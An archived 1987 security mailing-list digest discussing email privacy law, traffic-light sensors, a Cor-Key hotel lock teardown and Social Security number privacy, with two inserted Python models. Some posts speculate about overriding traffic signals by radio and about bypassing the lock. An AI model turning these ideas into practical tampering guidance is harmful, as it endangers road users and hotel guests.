(2) The addition of chapter 121 to U.S. Code, Title 18, starting with section 2701, which protects stored electronic communication, i.e. before the communication is sent and after it is received; chapter 119 (above) handles communications in transit.

The act amends several other sections. I've just mentioned the ones related to running a computer or computer network. Also please note that I'm not an attorney, just a systems programmer. However -- we've been unfortunate enough to have a case here in which this law may get tested. Any comments as to the strengths/weaknesses of this law, particularly as related to interception of an employee's electronic communications, would be greatly appreciated.

David Nessl
BITNET: david@nervm
Internet: david%nervm.bitnet@wiscvm.wisc.edu
(Disclaimer: the above views do not reflect those of my employer.)

From: ssr@tumtum.cs.umd.edu 14-May-1987 14:40:19
To: gymble!harvard!axiom!security!;@mimsy.umd.edu, AWalker@RED.RUTGERS.EDU
Subj: [1175] Re: Digest of accumulated msgs about traffic light sensors

The traffic lights here in the DC metro area are activated by strobes but use a multiple repetition sequence (i.e. two flashes per sec.
followed by a three second blank) to ferret out phreaks and other undesirable signals. The strobe must also be of a considerable candlepower (i.e. a photo flash won't even get close). During rush hour the real busy intersections are radio synched in order to keep the flow of traffic steady. The freq. is somewhere in the 490 MHz area. The actual information is only a simple set of 20 - 25 tones that are transmitted in pre-set intervals over 2 - 3 minutes and then repeat. All the associated traffic lights have directional antennas aimed at the base station (which is on Ft. Reno Dr. and Wisconsin Ave. for anyone interested). It strikes me that one could use a scanner to find the tone associated with one's favorite traffic light and just use a low power x-mitter to override the traffic light as one approaches.

ssr

From: James M Galvin 14-May-1987 16:29:41
To: security@red.rutgers.edu
Subj: [1147] Re: Electronic mail privacy

> Prying into electronic mail is now as
> criminal as opening the U.S. Mail and even the government
> cannot intrude without a warrant...."

Sorry, but prying into electronic mail can be a necessary evil. If a host is using a less than optimal mail system (of which many are), then when things get stuck or broken, someone has to look at the addresses in the message. This may or may not require reviewing the message.

Note that the situation is not analogous to the "dead letter office" of a postal service, since all mail should contain a return address. It may not be correct, meaning both completely inaccurate or simply unparsable, but that is a separate issue.

As for electronic mail privacy in general, I would love a good discussion, moderator permitting. I know plenty about it (and lack of it). What would you like to know?

Jim

[Isn't there a more appropriate mailing list where such things are discussed continually and at length? If not, then go for it...
_H*]

From: cheshire@OLDBORAX.LCS.MIT.EDU (Richard Cheshire) 14-May-1987 19:43:20
To: SYSTEM%CRNLNS.BITNET@wiscvm.wisc.edu, security@red.rutgers.edu
Subj: [572] Re: Electronic mail privacy

Great! There's legislation to stop it! Hurrah! After all, look at how much drug legislation there is, and how it has decreased drug trafficking. There are more and more laws regulating automobiles, so there will be fewer accidents. That legislation also treats head on the "Human Nature" issues. How? Just by making things illegal.

Cheshire
A.K.A The Cheshire Catalyst

From: Fred Blonder 14-May-1987 23:18:15
To: awalker@red.rutgers.edu
Subj: [1116] Re: Digest of accumulated msgs about traffic light sensors

    Date: Fri, 17 Apr 87 17:00:38 CST
    From: paul@uxc.cso.uiuc.edu (Paul Pomes - The Wonder Llama)
    . . .
    One possible variation on using a timing light to trip the lights would be to filter out the visible portion of the spectrum leaving UV and IR. Depending on the sensitivity of the detector and the transmission properties of intervening materials, the sensor could be triggered by an invisible means.

The "obvious solution" (well, I admit there'd be problems) would be to have a directional SOUND sensor on the traffic lights which listens for a siren. Since non-emergency use of a siren is already illegal in most places, coupled with the fact that it's difficult to use a siren without anyone noticing ( :-) ) traffic-light phreaks won't (shouldn't (mightn't)) be much of a problem. It'd also be one less thing to hang on emergency vehicles.

----
Fred Blonder (301) 454-7690
seismo!mimsy!fred
Fred@Mimsy.umd.edu

From: McNelly.OsbuSouth@Xerox.COM 15-May-1987 16:10:16
To: AWalker@RED.RUTGERS.EDU
Subj: [491] Re: Digest of accumulated msgs about traffic light sensors

I heard a rumor that their answer to "traffic light phreaks" is to set the traffic lights to turn red for all four directions upon detection of the strobe.
Emergency vehicles can still proceed through the empty intersection, and there is negative incentive for traffic light phreaks to mess with the lights.

-- John --

From: Jeffrey R Kell 18-May-1987 15:24:45
To: SECURITY@RED.RUTGERS.EDU
Subj: [1417] Re: Prying into electronic mail

>Re: Recent quote from IBM ad in "InformationWeek"
>
>Regardless of the legal penalties for prying into electronic mail, it
>seems to me that enforcement will be difficult if not impossible. The
>nature of messages makes them readily readable by anyone, [...]

(1) Does this make you subject to prosecution should you simply "see" a message within the scope of your designated duties (ie, watching a line monitor, updating a mailer daemon/DVM, acting as postmaster)?

(2) Is this law even applicable to public (and/or Internet) networks in the first place? It would appear only applicable to common-carrier nets or services such as MCI-Mail, Telenet, Comshare, etc. If you have two tin cans and a piece of string between offices, such facilities are not subject to FCA telecommunications restrictions :-)

+-----------------------------------+----------------------------------+
| Jeffrey R Kell, Dir Tech Services | Bell: (615)-755-4551             |
| Admin Computing, 117 Hunter Hall  |Bitnet: JEFF@UTCVM.BITNET         |
| Univ of Tennessee at Chattanooga  |Internet address below:           |
| Chattanooga, TN 37403             |JEFF%UTCVM.BITNET@WISCVM.WISC.EDU |
+-----------------------------------+----------------------------------+

From: Brint Cooper 19-May-1987 10:11:08
To: security@RED.RUTGERS.EDU
Subj: [816] Re: The Electronic Communications Privacy Act

Henry Mensch writes, quoting the Vice President for Information Systems:

> Specifically, individuals who access electronic files without
> appropriate authorization could find themselves subject to criminal
> penalties under this new law.

It seems that "appropriate authorization" is the governing concept.
In the typical Unix environment (if there is such a thing), it is routinely assumed that files made readable by the public carry the implicit presumption of permission to read. If the law fails to recognize this, then every one of us who has ever read his neighbor's C code to get the solution to a programming problem has broken the law.

_Brint

From: "David D. Story" 20-May-1987 00:56:17
To: security@RED.RUTGERS.EDU
Subj: [1130] Electronic Mail Security

I would think that the service would have to be specifically a mail service or system. This would fall under the intended use of a system and messages such as wayward system messages, ARPAlist messages and others do not fill the definition of mail. It would be the service that is responsible legally and the rest would fall under ordinary privacy laws. This would be in line with UPS, Fed Express, Purolator, Courier, and the U.S. Mail. There was a considerable fight some years back, I believe the 60's, where U.S. Mail Package Service was upgraded in Protection to U.P.S.

Does anyone have the exact definition of mail as used in this law? or what it takes for a system to qualify? Must the company file for licenses to be covered under such a law?

This is extremely vague but I applaud MIT's Tech Talk, (is there any other?), for their normative editorial position toward electronic messaging and conferencing privacy.

Dave

From: 20-May-1987 15:55:47
To: SECURITY@RED.RUTGERS.EDU
Subj: [702] MAIL Privacy Discussion

> [Isn't there a more appropriate mailing list where such things are discussed
> continually and at length? If not, then go for it... _H*]

Yes. On BITNET, it's known as MAIL-L, and is available from a number of LISTSERVers. I receive mine from LISTSERV@BITNIC.

Hugh Pritchard                          PRITCHAR@CUA.BITNET
Systems Programming
The Catholic University of America
Computer Center                         (202) 635-5373
Washington, DC 20064

Disclaimer: My views aren't necessarily those of the Pope.
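Picking up Barry Shein's point from the deletion thread earlier in this digest: a find|cpio style incremental backup records files but not deletions, so a full restore resurrects everything ever archived, and the fix he names is to also back up the state of the directories and apply that last. The following is an added example, not code from the list, that models exactly that. The incremental run is "archive every file modified after the previous run" plus a manifest of every path present at that moment; the restore replays the archives and then removes whatever the newest manifest does not list. Directory names, file names and the fixed timestamps are constructed for the demonstration.

```python
"""Backups that record directory state, so a restore can re-apply deletions.

Added example, not code from the list. The tape is modelled in memory as a
list of runs; each run holds an archive (the find|cpio part) and a manifest
of every path that existed when the run was taken (the part Shein says
sites skip). File names and mtimes below are constructed for the demo.
"""
import os
import shutil
import tempfile


def scan(root):
    """Relative path -> mtime for every regular file under root."""
    state = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            state[os.path.relpath(full, root)] = os.stat(full).st_mtime
    return state


def take_backup(root, since, now):
    """One incremental run: archive files changed after `since` and, separately,
    record the full manifest of paths that exist right now."""
    state = scan(root)
    archive = {}
    for rel, mtime in state.items():
        if mtime > since:
            with open(os.path.join(root, rel), "rb") as f:
                archive[rel] = f.read()
    return {"taken_at": now, "archive": archive, "manifest": set(state)}


def replay_archives(root, runs):
    """Unpack every run's archive in order, as a tape-by-tape restore would."""
    for run in runs:
        for rel, data in run["archive"].items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)


def naive_restore(root, runs):
    """Archives only: anything ever backed up comes back."""
    replay_archives(root, runs)
    return set(scan(root))


def restore_with_deletions(root, runs):
    """Archives first, then the newest manifest applied last: files deleted
    between the last two runs are removed again."""
    replay_archives(root, runs)
    keep = runs[-1]["manifest"]
    for rel in set(scan(root)) - keep:
        os.unlink(os.path.join(root, rel))
    return set(scan(root))


def scenario(restore):
    """Day 1: two files backed up. Day 2: one deleted, backed up again.
    Day 3: disk lost, restore into an empty tree. Returns what came back."""
    src, dst = tempfile.mkdtemp(), tempfile.mkdtemp()
    try:
        for name in ("notes.txt", "sensitive.txt"):
            path = os.path.join(src, name)
            with open(path, "wb") as f:
                f.write(b"constructed contents of " + name.encode())
            os.utime(path, (1000, 1000))   # fixed mtimes keep the demo deterministic
        runs = [take_backup(src, since=0, now=2000)]
        os.unlink(os.path.join(src, "sensitive.txt"))   # cleaned up before sabbatical
        runs.append(take_backup(src, since=2000, now=3000))
        assert not runs[-1]["archive"]   # nothing changed, so nothing archived...
        return restore(dst, runs)        # ...only the manifest knows about the deletion
    finally:
        shutil.rmtree(src)
        shutil.rmtree(dst)


if __name__ == "__main__":
    print("naive restore brings back:", sorted(scenario(naive_restore)))
    print("manifest-aware restore:   ", sorted(scenario(restore_with_deletions)))
```

The manifest is cheap (a list of paths) compared with the archive, which is why it belongs in every run even when the find pipe archives nothing. It also addresses Shein's second message about restores that overflow an almost-full disk: pruning to the manifest, or consulting it before replaying, keeps the restored tree the size the disk actually held.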
From: Bob Dixon 20-May-1987 12:17:53
To: SECURITY@RED.RUTGERS.EDU
Subj: [1444] Impractical Legislation

Another aspect of the recent privacy legislation concerns radio receivers. For the first time in US history, it is now illegal to tune a radio receiver to certain frequencies and listen to whatever may be transmitted there. This refers specifically to the cellular radio frequencies in the 800 MHz range, which are used for mobile telephones. The vendors of these systems have been telling their customers they are just as private as wire connections, but this has never been true. But since it improves sales to make the claim, they still do, and now there is legislation that tries to make it be true by fiat. Any UHF TV receiver and many commonly-available scanner receivers can tune to these frequencies, so it seems futile to say in essence "don't touch that dial" to someone who might happen to tune across those particular frequencies. The FCC has already said they have no intention of enforcing this legislation. The vendors could always encode their signals, but they do not want to as that would raise costs and decrease profits.

I heard that some legislative body once decreed that pi = 3 exactly, because it made calculations easier.

Bob Dixon
Ohio State University

From: 20-May-1987 12:55:49
To: security@uga
Subj: [1599] Re: Electronic mail privacy

> From: Richard Cheshire
> Great! There's legislation to stop it! Hurrah! After all, look at how much
> drug legislation there is, and how it has decreased drug trafficking. There
> are more and more laws regulating automobiles, so there will be fewer
> accidents. That legislation also treats head on the "Human Nature" issues.
> How? Just by making things illegal.

Agreed! Just as it seems to be with your other examples, I think it is up to individual security people and system administrators how seriously they take mail privacy and enforcement of the rules.
It seems to me that anyone who values mail privacy should work to ensure it and punish those who do the breaking, and that those who make the choice not to care as much should not mind so much when their mail system gets taken apart. Yes, this would be a step backward (a giant leap?) in standardization of legislation, and I realize it would be impractical to leave these decisions to each individual system's policies. But, is this kind of standardization necessary?

While I'm thinking (it is indeed rare), what does this do to plans I have heard about from the phone company to charge more for lines which are used with a modem? If it is my residential line, they would have to have some kind of line-monitoring. If I am doing e-mail, is their line monitoring illegal? Is it legal when I'm not?

Chris Petersen
Disclaimer: Who cares what I say anyway?

From: Henry Mensch 20-May-1987 14:28:06
To:
Subj: [339] Re: Electronic mail privacy

>> [Isn't there a more appropriate mailing list where such things are discussed
>> continually and at length? If not, then go for it... _H*]

This has already been beaten to death in the RISKS digest, I think.

-- Henry

From: Jack Ostroff 21-May-1987 11:23:54
To: security@RED.RUTGERS.EDU
Subj: [1044] more on traffic light sensors

From my experience of having driven ambulances and a fire truck (both as a volunteer, not a professional) changing all four directions to red might decrease problems with traffic light phreaks, but green really helps. Even emergency vehicles with lights and sirens on are supposed to stop before proceeding through a red light. (I know it doesn't always happen that way, but if an emergency driver doesn't stop at a red light, any accident is considered his fault.)

The second problem is with having the lights respond to the siren.
Most emergency vehicles use electronic sirens - which can produce several kinds of sounds (wail, yelp, hi-lo) and drivers frequently keep switching between them to try to get the attention of oblivious drivers of nearly sound-proof cars. Such sensors would have to respond to all modes of all makes of sirens used in that area.

Jack (OSTROFF@RED.RUTGERS.EDU)

From: davy@intrepid.ecn.purdue.edu (Dave Curry) 24-May-1987 20:25:01
To: risks@csl.sri.com, security@red.rutgers.edu
Subj: [1433] Electronic Communications Privacy Act

When I got the MIT notice from the SECURITY list, I did a little digging in the law books (Purdue's library is a Federal Depository). I pulled out a copy of the Act (Public Law 99-508, H.R. 4952) and a copy of Title 18 of the United States Code, which it amends. From this (after a couple of hours of "strike words a through f, insert words g through m" -- I'd hate to be a law clerk), I extracted most of the "interesting" parts of the law. These parts pertain to administrators and users of electronic communications services (if your machine has electronic mail or bboards, it fits into this category). The parts I specifically went for were what we can and cannot do, what the punishment is if we do it, and what our means of recourse are if it's done to us. I left out all the stuff about government agents being able to requisition things and stuff, and all the stuff pertaining to radio and satellite communications.

So anyway, I typed all this stuff in to give it to our staff so they'd be aware of the new legislation. Since there is probably interest in this, I am making the document available for anonymous ftp from the host intrepid.ecn.purdue.edu. Grab the file "pub/PrivacyAct.troff" if you have troff (it looks better), or "pub/PrivacyAct.output" if you need a pre-formatted copy.

Bear in mind I'm not a lawyer, and I just typed in the parts of the law I deemed to be of interest to our staff.
--Dave Curry

From: Steinar Haug 27-May-1987 08:54:50
To: ,
Subj: [1049] Encryption, anyone?

In connection with the implementation of secure MHS (X.400 based) systems, I'm looking for any available programs to perform DES and/or RSA encryption. Before you start telling me about it: Yes, I'm aware that there is a version of DES used in Unix systems to encrypt passwords. Yes, I'm aware of the MP multiple precision math package running under Unix. The trouble with both of these is that they are simply too slow! The Unix DES because (among other things) it was made slow on purpose; the mp package because it is a very general package using a lot of malloc/free calls. So I'm looking for something faster... Preferably written in C or Pascal, running on VMS or Unix systems.

Any help is appreciated!

Steinar Haug
Database Research Group, Computing Center at the Univ. of Trondheim, Norway
E-mail: haug%vax.runit.unit.uninett@nta-vax.arpa
        steinar@nta-vax.arpa

From: *Hobbit* 29-May-1987 06:42:15
To: security@RED.RUTGERS.EDU
Subj: [6668] Evaluation: Cor-Key Magnetic locks

I recently had a chance to disassemble and examine yet another type of hotel security system. These are all-mechanical magnetic door locks made by Cor-Key Systems in California. The user is given a small white plastic card with rounded ends, and inserts same into a slot in the top of a rather large doorknob on his room. Pushing the card all the way into the slot "connects" the knob to the actual latch hardware and allows entry; otherwise the knob just spins around.

The neat thing about these is that the latch and the rest of the lock are a standard lockset that could have been made by anybody, and to upgrade to the Cor-Key system one simply has to install this other doorknob. Thus the hotel, which previously had regular old key locksets, avoided a lot of expense and retrofitting.

Internally, the lock works entirely by magnetism.
The card is laminated plastic over a layer of rather granular magnetic material that can be magnetized in small regions and hold the field virtually forever. When the card is inserted into the slot it covers up a matrix of 35 or so holes, and the tumblers move according to how the north or south regions on the card line up with the matrix. The tumblers themselves are small cylindrical permanent magnets, and are attracted or repelled by the card regions. About nine of these are sprinkled around the matrix, leaving a lot of the holes empty. Each tumbler has a spot of either red or blue ink on one end to indicate its polarity.

The parts are arranged as follows, moving toward the door along the axis of the shaft. Front doorknob surface, steel plate, card slot, thin nonmagnetic metal plate, brass plate with holes, plastic slider with wells containing the tumblers. Everything except the plastic slider is fixed in place; the slider is held in place by the tumblers, which normally are attracted partway out of their wells toward the steel plate and are thus protruding through the holes in the brass plate. Thus the slider can't slide, because the tumblers are locking it to the brass plate.

The correct key imposes itself down between the steel plate and the tumblers, and if the regions on the key repel *all* the tumblers away from itself, all the tumblers retreat into the plastic housing out of the brass plate. Then the slider is free to move, which it does when the key is pushed down the last quarter-inch or so. This engages the latch mechanism and connects it to the knob, so the door will open when the knob is turned.

There is a mechanism for rekeying a door quickly: near the bottom of the knob there are two small holes through which a small tool can be inserted. Under these are two rotating alloy carriers, each containing one tumbler. Each carrier can be rotated to one of four positions, giving a total of 16 combinations between them.
Rotating one of these moves the respective tumbler to a different point in the matrix, thus disabling one key and allowing a new one to work. Guest keys would have variable encoding in these matrix regions, and the master key[s] would be configured such that they would address these tumblers regardless of where they were. Since this only creates 16 possible combinations between them, it is a "first level" of mastering which can be changed without disassembly.

More in-depth mastering is done by leaving parts of the static matrix empty, but the tumblers that are installed will match the corresponding regions of the master keys. In an unmastered system, if the entire matrix were filled with tumblers, all the locks and keys would be configured the same and all keys would work everywhere. Each lock is made unique by removing different parts of the matrix, and each guest key is made unique by differently magnetizing the "don't care" regions that correspond to the empty parts of the matrix in the given door. Thus Guest A's key will correctly address the parts of the matrix that Room A's knob contains, but the *other* regions in his key will incorrectly address the filled matrix locations of Room B's lock. The master key essentially repels the entire matrix's worth of tumblers, whether it's there or not. It was mentioned that the master also has a hole in the appropriate place to bypass the double-locking mechanism -- normally when the door is double-locked, a small rod protrudes into the key slot and completely prevents insertion of a normal key.

Each location in the matrix is numbered [not in any obvious way, but...] so that the combination can easily be represented by a computer. Although in the past when the company started, records of whose lock contained what were kept in large books, computers are now being used to keep track of this. The keys are magnetized at the desk with a machine containing an equivalent matrix full of electromagnets.
These can generate, I'm told by the Cor-Key people, fields of 250 gauss or so. A key region can be made north, south, or neutral; it is possible to "read" a key's encoding by running a !small! magnet over it and feeling if it's attracted, repelled, or ignored. [One of the tumblers glued to a piece of flexible wire worked fine.] However, even examining the part of the matrix you were given only gives you a small section of the master key, so it's virtually impossible to generate a hotel master by examining your own lock.

Pick this one? Forget it. The tumblers are inaccessible behind the thin nonmagnetic plate. Perhaps a very large strong electromagnet could fit over the entire knob, remagnetize *all* the tumblers one way [good luck!] and then apply a gentler field in the reverse direction to push them all inward. I really don't see something like this working either. An expensive and precise piece of equipment could conceivably be built to stick a small coil down into the slot and "read" the matrix by applying fields in different directions while the user listens for each individual tumbler to bang against one end or the other. Yuk.

Conceptually, therefore, the Cor-Key is fairly secure. Unfortunately the workmanship of the lock itself is a bit on the shoddy side, and I was told by the people who build them that the official "backdoor" used in cases where the lock is completely screwed up is to drill a hole in a magic spot and force the latch mechanism to engage. Furthermore, to *really* re-key the lock it must be taken completely apart, because any key encoded the same all over the two changeable regions will open the lock regardless of where the carriers are rotated to.

_H*

From: Michael Robinson 29-May-1987 13:55:21
To: SECURITY Digest
Subj: [911] Privacy in Electronic Communication

You'd have an awfully hard time proving a case of electronic espionage against someone if you failed to take any steps to protect your own interests.
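As an added illustration of the keying scheme in the Cor-Key evaluation above (this is not code from the posting), the following Python model treats each matrix position as a key region and applies the opening rule the evaluation describes: the slider moves only when every installed tumbler faces a key region of its own polarity. The 35-position size is from the posting; the polarity pattern, the carrier positions and the room layouts are constructed assumptions.

```python
"""Toy model of the Cor-Key magnetic-matrix lock and its mastering scheme.

Added example, not code from the original posting.  The polarity pattern,
the carrier positions and the room layouts below are constructed.
"""
from dataclasses import dataclass
from itertools import product

N, S = "N", "S"                       # polarity of a tumbler or key region
OPPOSITE = {N: S, S: N}

# Constructed system-wide pattern: the polarity a tumbler would have at each
# of the 35 matrix positions if the whole matrix were filled.  In an
# unmastered system every lock and key would simply be this pattern; the
# master key is exactly this pattern.
MASTER_PATTERN = "NSSNNSNSSNNSSNSNNSSNSNNSNSSNNSNSSNS"
MATRIX_SIZE = len(MASTER_PATTERN)     # 35, the "35 or so" holes
assert MATRIX_SIZE == 35

# The two quick-rekey carriers each hold one tumbler that can be rotated into
# one of four matrix positions (which positions is a constructed choice).
CARRIER_POSITIONS = ((27, 28, 29, 30), (31, 32, 33, 34))
STATIC_POSITIONS = range(27)          # the rest of the matrix is fixed


@dataclass(frozen=True)
class Lock:
    static: frozenset                 # fixed positions that hold a tumbler
    carrier: tuple = (0, 0)           # rotation (0..3) of each carrier

    def tumblers(self):
        """position -> polarity for every tumbler currently installed."""
        pos = set(self.static)
        for slots, idx in zip(CARRIER_POSITIONS, self.carrier):
            pos.add(slots[idx])
        return {p: MASTER_PATTERN[p] for p in pos}

    def opens_with(self, key):
        # A tumbler retreats only when the key region facing it has the same
        # polarity (like poles repel).  One attracted tumbler stays in the
        # brass plate and the slider cannot move, so all must be repelled.
        return all(key[p] == pol for p, pol in self.tumblers().items())

    def rekeyed(self, a, b):
        """Quick rekey through the two small holes: rotate the carriers."""
        return Lock(self.static, (a % 4, b % 4))


def master_key():
    """Repels the entire matrix's worth of tumblers, whether present or not."""
    return list(MASTER_PATTERN)


def guest_key(lock):
    """Correct polarity wherever this lock holds a tumbler; every other region
    is a "don't care" for this lock and is magnetized the opposite way, so the
    key attracts any tumbler that another lock keeps in those positions."""
    present = lock.tumblers()
    return [present.get(p, OPPOSITE[MASTER_PATTERN[p]]) for p in range(MATRIX_SIZE)]


def carrier_spanning_key(lock):
    """The weakness the evaluation ends with: a guest key encoded correctly
    over all four positions of both carriers survives any quick rekey."""
    key = guest_key(lock)
    for slots in CARRIER_POSITIONS:
        for p in slots:
            key[p] = MASTER_PATTERN[p]
    return key


def opens_for_every_carrier_setting(lock, key):
    """True if no rotation of the carriers (16 settings) shuts this key out."""
    return all(lock.rekeyed(a, b).opens_with(key)
               for a, b in product(range(4), repeat=2))


def master_regions_learned(lock):
    """Fraction of the master pattern a guest learns by reading his own lock:
    only the positions that actually hold tumblers."""
    return len(lock.tumblers()) / MATRIX_SIZE


# Constructed rooms: seven fixed tumblers each plus the two carrier tumblers,
# about nine in all, with a different part of the matrix left empty.
ROOM_A = Lock(frozenset({0, 3, 8, 12, 17, 21, 25}))
ROOM_B = Lock(frozenset({1, 3, 9, 12, 16, 22, 26}))

if __name__ == "__main__":
    key_a = guest_key(ROOM_A)
    print("guest A opens A:", ROOM_A.opens_with(key_a))                  # True
    print("guest A opens B:", ROOM_B.opens_with(key_a))                  # False
    print("master opens both:", ROOM_A.opens_with(master_key())
          and ROOM_B.opens_with(master_key()))                           # True
    print("guest A after rekey:", ROOM_A.rekeyed(1, 0).opens_with(key_a))  # False
    print("master fraction learned from own lock: %.2f"
          % master_regions_learned(ROOM_A))
```

Rotating a carrier disables the old guest key and a freshly encoded guest key works again, while the master passes all 16 settings; the last function shows why reading your own lock yields only 9 of 35 master regions.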
The burden of proof always rests with the prosecution. The easiest way to send sensitive information is to use the telephone or some other network which has made some sort of legal guarantee of privacy. And take some sort of action to protect your interests in the event of casual contact. For example, you can encrypt the message and attach a plaintext notice which clearly states that the contents of the message are confidential. Casual contact with the message will not damage your interests. No one who tampers with the message can honestly say that they didn't know that it was wrong.

/mr/

From: 4-Jun-1987 22:30:31
To: security@red.rutgers.edu
Subj: [557] Re: Evaluation: Cor-Key Magnetic locks

Science marches forward: A piece of high-temperature superconductor would repel all the tumblers. A magnetic metal with a low (but above room temperature) Curie point could be heated to above the Curie point, inserted into the slot, and allowed to cool. It would then carry a "negative" field of the correct key. You'd have to reverse the polarity of each magnetized region. Gee, what fun.

Matt Crawford

From: Chris Miller 11-Jun-1987 11:52:12
To: security@RUTGERS.EDU
Subj: [1115] References request

I am currently researching a PhD in computer security at Heriot-Watt University, Edinburgh, Scotland. My main topic is formal models and their representation as logical rules in an expert system or logic database. At this time I am still reviewing the literature in the field, and as such I would be extremely grateful for any information/reference list or conference proceedings that readers can recommend. Many thanks.

-----------------------------------------------------------------------------
David J Ferbrache          |
Heriot-Watt University     | JANET : davidf@uk.ac.hw.cs
Dept of Computer Science   | UUCP  : davidf@cs.hw.ac.uk
79 Grassmarket             | TELE  : (UK) 31-225-6465 ext 553
Edinburgh EH1 2HJ          |
Scotland.                  |
From: kohl@anl-mcs.arpa (C-234) 24-Jun-1987 15:47:24
To: Security@RUTGERS.EDU
Subj: [670] Security Auditing Program

Greetings: I am looking for a copy of the source code (online) for a set of security auditing programs as described and listed in the book "UNIX SYSTEM SECURITY" by Wood and Kochan. Could you provide me with this software or point me to who could? I would rather not type in 20 pages of code if I could help it. Also if there are any other Unix security programs which might be of interest, please let me know.

Thanks for your time,
Jim Kohl
Mathematics and Computer Science Division
Argonne National Laboratory
(kohl@anl-mcs.arpa)

From: hao!gatech!spaf@ames.arpa (Gene Spafford) 21-Jul-1987 14:37:36
To: security@RUTGERS.EDU
Subj: [5205] SS# & Utilities -- a story

As a matter of principle, I'm one of those people who won't give out my social security number when applying for utilities or credit cards. The reasons why have been discussed numerous times in various security-related groups. It is my understanding that it is against the law to force someone to give his/her social security number unless it is a government agency; although I've often run into occasional resistance, a few moments of explanation has usually resulted in things working out okay.

Then there's today. I'm moving to W. Lafayette Indiana in two weeks and I called to establish my phone service there. Indiana is served by GTE for phone service. I did not anticipate any problems since I have an excellent credit history, as could be verified by a quick check with the local Southern Bell folks. After the rep at GTE took all my information down, she asked for my SS#. I explained that I don't give that out. She informed me that I would be required to pay a $75 deposit if I refused to give my SS#. So, I asked to talk to her supervisor. Her supervisor repeated that I would have to give my SS# to waive the deposit.
I asked if they could simply call Southern Bell or take a credit card #, or they could call Purdue and verify my employment. He said that wasn't enough -- I had to supply my SS#, no other option. I enquired as to why they needed it -- he said it was for a credit check and to verify future disconnect requests. I explained that they could do that self-same credit check without the SS# *and* I don't give out my SS# precisely because I don't want it used as a verification number on my account. He insisted I either supply the number or pay the deposit. He also asked why I was being so stubborn -- it was even on my driver's license, wasn't it? (It isn't -- and hasn't been. In Georgia, you have always had the option of having a different ID, and now the licenses are being issued with those as default. The guy at GTE claims that the Indiana licenses are *required* to have the SS# on them -- anyone know if this is true? It shouldn't be...)

I explained that having done some work in computer security, and personal experience, I know how that number can be abused. He said I was the only person he'd ever run into to refuse to give the SS# (!). I then asked him if the requirement for a SS# was written policy -- I wanted a copy to examine. He informed me that such information was private to the company and I couldn't have a copy -- didn't I trust him? I then asked if that policy was on file with the state Public Service Commission. At that he (rather loudly) asked if I wanted service with GTE or not? I asked him very calmly if he was threatening to deny me service -- he quieted down. I next explained that I wanted to see a copy of the written policy because it would be interesting to include in an article I might write on improper use of SS#s. He became very quiet. I offered to find the name and number of someone at Southern Bell who could verify my 9 years of service here. He said to call back with that information (thankful to get rid of me, I guess).
The lady I talked to at Southern Bell was very helpful. She informed me that all the Southern Bell operators are told not to force a SS# because it is against both policy and law, but if someone won't provide it they are to get a bank account # or credit card number (both of which I am willing to give in circumstances such as this). She was more than willing to talk to the supervisor at GTE and give him a credit reference, if only he'd call. She said she'd also fill him in on policy. *AND*, most interestingly, Southern Bell had somehow obtained my SS# through other means and it was on file, but she marked it so that it was not to be given out to anyone, specifically not anyone with GTE Indiana. :-)

Back to GTE. I called the supervisor (collect, of course) and gave him the name and number of the lady at Southern Bell. He was very curt and said he'd probably still require a deposit. He hung up on me. 20 minutes later the original GTE operator called me back and cheerily informed me that my service would be turned on August 4 with *no* deposit required!

Questions
---------

1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too?

2) Anyone know if other people at GTE Indiana are such jerks, or is this an isolated instance?

3) Anyone know if Indiana does, in fact, *require* that the SS# be on the driver's license?

4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort).

Too bad we don't have a choice of phone companies as well as long distance carriers -- I'd keep Southern Bell.
--
Gene Spafford
Software Engineering Research Center (SERC), Georgia Tech, Atlanta GA 30332
Internet: spaf@gatech.gatech.edu
uucp: ...!{decvax,hplabs,ihnp4,linus,rutgers,seismo}!gatech!spaf

From: khayo@locus.ucla.edu 21-Jul-1987 16:08:09
To: security@RUTGERS.EDU
Subj: [2289] Re: SS# & Utilities -- a story

In article <16026@gatech.edu> spaf@gatech.UUCP (Gene Spafford) writes:
> As a matter of principle, I'm one of those people who won't give out my social security number when applying for utilities or credit cards. (...)
> 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too?

When I came to the US I was sufficiently worried about getting a bank acct., insurance etc. that I didn't even think about this problem. Now I wish I had - not because of any abuse of my SS# (at least I'm not aware of it), but as a matter of principle. Now my # is all over the place, so there's no point withholding it; but I'm glad to see that there still are some Don Quixotes like you. This country is one of the very few remaining in which *privacy* still has some practical meaning, and where an average guy can influence the world (at least locally) by *doing* things [to the skeptical "realists" out there: this may sound like idealism, I realize that, but believe me - it's true!].

> 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort).

YES, you should! YES, it's worth the effort. As an aside, my fight with windmills consists largely of writing letters to various Co.'s from which I received a less-than-reasonable service. I was surprised that most of them (Sears, United Airlines, Ralphs stores etc.) take such letters seriously - at least someone high-up reads them & sends an individually written reply.
In some cases I noticed that things that I complained about actually changed for the better just after I received an answer, but of course it may be a coincidence. But what surprised me even more is that so many people around me think I'm nuts to even bother, saying that it's a total waste of time. Oh, well, I'll just keep doing that until my Mac drops dead. (BTW, so far I got frustrated in only one case: USPS; 5 letters to the Postmaster without a reaction...)

Eric

From: duke!cds@mcnc.org (Craig D. Singer) 22-Jul-1987 15:09:15
To: security@RUTGERS.EDU
Subj: [2059] Re: SS# & Utilities -- a story

>As a matter of principle, I'm one of those people who won't give out my
>social security number when applying for utilities or credit cards.
>(...)
>
>1) Do many of you (net-readers) withhold your SS# in similar circumstances?
>Do you have these kinds of confrontations too?

> When I came to the US I was sufficiently worried about getting a bank acct., insurance etc. that I didn't even think about this problem. Now I wish I had - not because of any abuse of my SS# (at least I'm not aware of it), but as a matter of principle. Now my # is all over the place, so there's no point withholding it; but I'm glad to see that there still are some Don Quixotes like you.

